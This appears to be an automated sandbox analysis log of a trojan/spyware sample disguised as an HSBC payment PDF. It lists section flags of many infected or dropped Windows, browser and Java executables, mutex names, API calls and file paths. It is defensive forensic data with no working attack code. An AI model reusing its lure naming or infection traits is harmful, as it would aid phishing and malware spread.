              Source: cookie_exporter.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: chrome_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: crashreporter.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleCrashHandler64.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdate.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateBroker.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: default-browser-agent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateComRegisterShell64.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: firefox.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateCore.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: GoogleUpdateOnDemand.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: minidump-analyzer.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pingsender.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: plugin-container.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: private_browsing.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: updater.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Au3Info.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jabswitch.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java-rmi.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: java.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javacpl.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaw.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: javaws.exe0.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jjs.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: jp2launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: keytool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: kinit.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: klist.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ktab.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: orbd.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: pack200.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: policytool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmid.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: rmiregistry.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: servertool.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssvagent.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: tnameserv.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: unpack200.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ie_to_edge_stub.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: cookie_exporter.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: identity_helper.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: setup.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedgewebview2.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_proxy.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.3e70000.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
              Source: AdobeCollabSync.exe.4.drBinary string: @com.adobe.accp.review.v1\??\UNC\\\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\bisLoggingEnabled
              Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@20/165@24/13
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046A06A GetLastError,FormatMessageW,0_2_0046A06A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,0_2_004581CB
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004587E1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B333
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047EE0D
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C397
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404E89
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user\AppData\Roaming\9624e934681120d9.binJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-9624e934681120d99ea72c54-b
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9624e934681120d9-inf
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9624e934681120d99e7986a9-b
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut7315.tmpJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT content_item_relations.src_content_item_id, branches.download_state, content_items.creation_id,branches.content_item_id,branches.record_created, branches.modified, content_items.asset_id, content_items.type, content_items.content_item_type, content_items.removed_from_server, content_items.pending_local_delete, content_item_revisions.cloud_etag, content_item_revisions.updated, content_item_revisions.local_etag, content_item_revisions.request_id, content_item_revisions.content_name, content_item_resources.resource_cloud_etag , content_item_resources.resource_local_etag , resource_revisions.rel_to_content_item , resource_revisions.resource_type, resource_revisions.committed, resource_content.resource_content, (select 1 from branches where branch_name = 'conflict' AND content_item_id = :id) as is_conflicted,(SELECT 1 FROM branches JOIN content_items ON(content_items.creation_id = branches.content_item_id) WHERE( branches.app_id = :appId AND branches.branch_name = 'current' AND branches.content_item_id = :id AND (( content_items.pending_local_delete = 1 AND content_items.removed_from_server = 0) OR branches.content_item_revision_id not in( SELECT branches.content_item_revision_id FROM branches WHERE( branches.app_id = :appId AND branches.branch_name = 'base' AND branches.content_item_id = :id))))) as is_sync_pending, (SELECT resource_content.resource_content FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_resources ON (branches.content_item_revision_id = content_item_resources.content_item_revision_id) JOIN resource_revisions ON (content_item_resources.resource_revision_id = resource_revisions.revision_id) JOIN resource_content ON (resource_revisions.hash = resource_content.resource_content_id) WHERE( branches.content_item_id = :id AND branches.branch_name = 'error' AND branches.app_id = :appId)) as error_payload FROM branches JOIN content_items ON (branches.content_item_id = content_items.creation_id) JOIN content_item_revisions ON (branches.content_item_revision_id = content_item_revisions.content_item_revision_id) JOIN content_item_resources ON (branches.content_item_revision
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE branches SET content_item_revision_id = :contentItemRevisionId, modified = :modified, download_state = :downloadState WHERE( content_item_id = :contentItemId AND branch_name = :branchName AND app_id = :appId);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS resource_content ( resource_content_id TEXT PRIMARY KEY NOT NULL, resource_content TEXT NOT NULL);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT INTO content_items( creation_id, asset_id, type, content_item_type, created, removed_from_server, pending_local_delete) VALUES( :creationId, :assetId, :type, :contentItemType, :created, :removedFromServer, :pendingLocalDelete);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: SELECT pending_request_id, request_type, content_item_id, context, pending_request_created, request_status, message, status_code, device_mapping_id FROM pending_requests WHERE( request_type = :requestType);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: INSERT OR REPLACE INTO branches( content_item_id, content_item_revision_id, branch_name, app_id, is_transient, record_created, modified, download_state) VALUES( :contentItemId, :contentItemRevisionId, :branchName, :appId, :isTransient, :recordCreated, :modified, :downloadState);
              Source: AdobeCollabSync.exe.4.drBinary or memory string: UPDATE content_items SET pending_local_delete = :pendingLocalDelete WHERE( creation_id = :creationId);
